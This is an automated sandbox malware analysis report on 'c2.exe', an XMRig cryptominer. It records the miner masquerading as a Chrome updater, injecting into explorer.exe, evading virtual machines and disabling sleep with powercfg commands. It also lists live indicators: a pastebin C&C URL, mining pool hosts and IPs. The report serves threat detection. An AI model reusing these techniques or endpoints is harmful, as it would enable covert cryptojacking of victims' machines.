Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
c2.exe

Overview

General Information

Sample name:c2.exe
Analysis ID:1576710
MD5:eb0588e6420a0a2fb8b262554091add3
SHA1:5c2bdd9050a44b7afd028e9be44142da93232a37
SHA256:6cb04057a0313bc34459aba72170f4039148aaace0b396b6c881b92769199853
Tags:dacsanvinhchau-vnexeuser-JAMESWT_MHT
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
DNS related to crypt mining pools
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found strings related to Crypto-Mining
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • c2.exe (PID: 7428 cmdline: "C:\Users\user\Desktop\c2.exe" MD5: EB0588E6420A0A2FB8B262554091ADD3)
  • cmd.exe (PID: 7440 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7520 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 7560 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 7608 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 7620 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  • updater.exe (PID: 7684 cmdline: "C:\Program Files\Google\Chrome\updater.exe" MD5: EB0588E6420A0A2FB8B262554091ADD3)
    • conhost.exe (PID: 7808 cmdline: C:\Windows\System32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 7868 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cmd.exe (PID: 7696 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7772 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 7820 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 7836 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 7852 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  • updater.exe (PID: 7928 cmdline: "C:\Program Files\Google\Chrome\updater.exe" MD5: EB0588E6420A0A2FB8B262554091ADD3)
  • cmd.exe (PID: 7940 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7992 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 8044 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 8072 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 8096 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Windows\Temp\lnobvhjdatqu.tmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    C:\Windows\Temp\lnobvhjdatqu.tmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
    • 0x4e4b68:$a1: mining.set_target
    • 0x4e03c8:$a2: XMRIG_HOSTNAME
    • 0x4e1ed0:$a3: Usage: xmrig [OPTIONS]
    • 0x4e03a0:$a4: XMRIG_VERSION
    C:\Windows\Temp\lnobvhjdatqu.tmpMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
    • 0x4eac21:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
    C:\Windows\Temp\lnobvhjdatqu.tmpMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
    • 0x4eb1e0:$s1: %s/%s (Windows NT %lu.%lu
    • 0x4eba40:$s3: \\.\WinRing0_
    • 0x4e4178:$s4: pool_wallet
    • 0x4446e0:$s5: cryptonight
    • 0x4446f0:$s5: cryptonight
    • 0x444700:$s5: cryptonight
    • 0x444710:$s5: cryptonight
    • 0x444728:$s5: cryptonight
    • 0x444738:$s5: cryptonight
    • 0x444748:$s5: cryptonight
    • 0x444760:$s5: cryptonight
    • 0x444770:$s5: cryptonight
    • 0x444788:$s5: cryptonight
    • 0x4447a0:$s5: cryptonight
    • 0x4447b0:$s5: cryptonight
    • 0x4447c0:$s5: cryptonight
    • 0x4447d0:$s5: cryptonight
    • 0x4447e8:$s5: cryptonight
    • 0x444800:$s5: cryptonight
    • 0x444810:$s5: cryptonight
    • 0x444820:$s5: cryptonight

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000017.00000002.4158658044.0000000000D0F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
          • 0x4f5068:$a1: mining.set_target
          • 0x4f08c8:$a2: XMRIG_HOSTNAME
          • 0x4f23d0:$a3: Usage: xmrig [OPTIONS]
          • 0x4f08a0:$a4: XMRIG_VERSION
          Process Memory Space: conhost.exe PID: 7808JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            19.2.conhost.exe.1b6a8674a00.1.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              19.2.conhost.exe.1b6a8674a00.1.raw.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
              • 0x4f0668:$a1: mining.set_target
              • 0x4ebec8:$a2: XMRIG_HOSTNAME
              • 0x4ed9d0:$a3: Usage: xmrig [OPTIONS]
              • 0x4ebea0:$a4: XMRIG_VERSION
              19.2.conhost.exe.1b6a8674a00.1.raw.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
              • 0x4f6721:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
              19.2.conhost.exe.1b6a8674a00.1.raw.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
              • 0x4f6ce0:$s1: %s/%s (Windows NT %lu.%lu
              • 0x4f7540:$s3: \\.\WinRing0_
              • 0x4efc78:$s4: pool_wallet
              • 0x4501e0:$s5: cryptonight
              • 0x4501f0:$s5: cryptonight
              • 0x450200:$s5: cryptonight
              • 0x450210:$s5: cryptonight
              • 0x450228:$s5: cryptonight
              • 0x450238:$s5: cryptonight
              • 0x450248:$s5: cryptonight
              • 0x450260:$s5: cryptonight
              • 0x450270:$s5: cryptonight
              • 0x450288:$s5: cryptonight
              • 0x4502a0:$s5: cryptonight
              • 0x4502b0:$s5: cryptonight
              • 0x4502c0:$s5: cryptonight
              • 0x4502d0:$s5: cryptonight
              • 0x4502e8:$s5: cryptonight
              • 0x450300:$s5: cryptonight
              • 0x450310:$s5: cryptonight
              • 0x450320:$s5: cryptonight
              19.2.conhost.exe.1b6a8680500.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                Click to see the 11 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-17T12:46:06.900142+010020542471A Network Trojan was detected104.20.4.235443192.168.2.449731TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: c2.exeAvira: detected
                Antivirus detection for dropped file
                Source: C:\Program Files\Google\Chrome\updater.exeAvira: detection malicious, Label: TR/Crypt.EPACK.Gen2
                Multi AV Scanner detection for dropped file
                Source: C:\Program Files\Google\Chrome\updater.exeReversingLabs: Detection: 42%
                Source: C:\Windows\Temp\lnobvhjdatqu.tmpReversingLabs: Detection: 62%
                Multi AV Scanner detection for submitted file
                Source: c2.exeReversingLabs: Detection: 42%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Windows\Temp\lnobvhjdatqu.tmpJoe Sandbox ML: detected
                Source: C:\Program Files\Google\Chrome\updater.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: c2.exeJoe Sandbox ML: detected

                Bitcoin Miner

                barindex
                Yara detected Xmrig cryptocurrency miner
                Source: Yara matchFile source: 19.2.conhost.exe.1b6a8674a00.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.conhost.exe.1b6a8680500.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.conhost.exe.1b6a867cc20.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.conhost.exe.1b6a8680500.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000017.00000002.4158658044.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 7808, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7868, type: MEMORYSTR
                Source: Yara matchFile source: C:\Windows\Temp\lnobvhjdatqu.tmp, type: DROPPED
                DNS related to crypt mining pools
                Source: unknownDNS query: name: xmr-asia1.nanopool.org
                Found strings related to Crypto-Mining
                Source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                Source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
                Source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                Source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                Source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                Source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                Source: c2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2054247 - Severity 1 - ET MALWARE SilentCryptoMiner Agent Config Inbound : 104.20.4.235:443 -> 192.168.2.4:49731
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 103.3.62.64 10343Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 104.20.4.235 443Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 51.79.145.144 10343Jump to behavior
                Connects to a pastebin service (likely for C&C)
                Source: unknownDNS query: name: pastebin.com
                Source: global trafficTCP traffic: 192.168.2.4:49730 -> 103.3.62.64:10343
                Source: global trafficTCP traffic: 192.168.2.4:49732 -> 51.79.145.144:10343
                Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /raw/YLG9StR0 HTTP/1.1Accept: */*Connection: closeHost: pastebin.comUser-Agent: cpp-httplib/0.12.6
                Source: global trafficDNS traffic detected: DNS query: xmr-asia1.nanopool.org
                Source: global trafficDNS traffic detected: DNS query: pastebin.com
                Source: explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
                Source: explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
                Source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                Source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
                Source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                Source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                Source: explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca
                Source: explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
                Source: explorer.exe, 00000017.00000002.4158658044.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1700744936.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.4158658044.0000000000D51000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1732279591.0000000000D8F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/YLG9StR0
                Source: explorer.exe, 00000017.00000003.1732250618.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/YLG9StR0$
                Source: explorer.exe, 00000017.00000002.4158658044.0000000000CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/YLG9StR0--cinit-stealth-targets=Taskmgr.exe
                Source: explorer.exe, 00000017.00000003.1700744936.0000000000D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/YLG9StR08
                Source: explorer.exe, 00000017.00000002.4158658044.0000000000CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/YLG9StR090
                Source: explorer.exe, 00000017.00000003.1700744936.0000000000D10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/YLG9StR0Taskmgr.exe
                Source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 19.2.conhost.exe.1b6a8674a00.1.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 19.2.conhost.exe.1b6a8674a00.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 19.2.conhost.exe.1b6a8674a00.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 19.2.conhost.exe.1b6a8680500.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 19.2.conhost.exe.1b6a8680500.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 19.2.conhost.exe.1b6a8680500.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 19.2.conhost.exe.1b6a867cc20.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 19.2.conhost.exe.1b6a867cc20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 19.2.conhost.exe.1b6a867cc20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 19.2.conhost.exe.1b6a8680500.0.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 19.2.conhost.exe.1b6a8680500.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 19.2.conhost.exe.1b6a8680500.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: Process Memory Space: conhost.exe PID: 7808, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: C:\Windows\Temp\lnobvhjdatqu.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: C:\Windows\Temp\lnobvhjdatqu.tmp, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: C:\Windows\Temp\lnobvhjdatqu.tmp, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
                Uses powercfg.exe to modify the power settings
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                Source: C:\Windows\System32\conhost.exeCode function: 19_2_00007FF778012F50 NtReadFile,19_2_00007FF778012F50
                Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\TEMP\ppefirylicdf.sysJump to behavior
                Source: C:\Program Files\Google\Chrome\updater.exeFile deleted: C:\Windows\Temp\wjwbvsfqhrdh.xmlJump to behavior
                Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\lnobvhjdatqu.tmp 3D0E5AED0AFC5A7719AF93C49C55E6CE91ADFFE5CC50D1597ABB1CCED05FFAA3
                Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\ppefirylicdf.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                Source: C:\Windows\System32\conhost.exeCode function: String function: 00007FF778012F50 appears 31 times
                Source: updater.exe.0.drStatic PE information: Number of sections : 11 > 10
                Source: c2.exeStatic PE information: Number of sections : 11 > 10
                Source: 19.2.conhost.exe.1b6a8674a00.1.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 19.2.conhost.exe.1b6a8674a00.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 19.2.conhost.exe.1b6a8674a00.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 19.2.conhost.exe.1b6a8680500.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 19.2.conhost.exe.1b6a8680500.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 19.2.conhost.exe.1b6a8680500.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 19.2.conhost.exe.1b6a867cc20.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 19.2.conhost.exe.1b6a867cc20.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 19.2.conhost.exe.1b6a867cc20.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 19.2.conhost.exe.1b6a8680500.0.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 19.2.conhost.exe.1b6a8680500.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 19.2.conhost.exe.1b6a8680500.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: Process Memory Space: conhost.exe PID: 7808, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: C:\Windows\Temp\lnobvhjdatqu.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: C:\Windows\Temp\lnobvhjdatqu.tmp, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: C:\Windows\Temp\lnobvhjdatqu.tmp, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@45/5@2/3
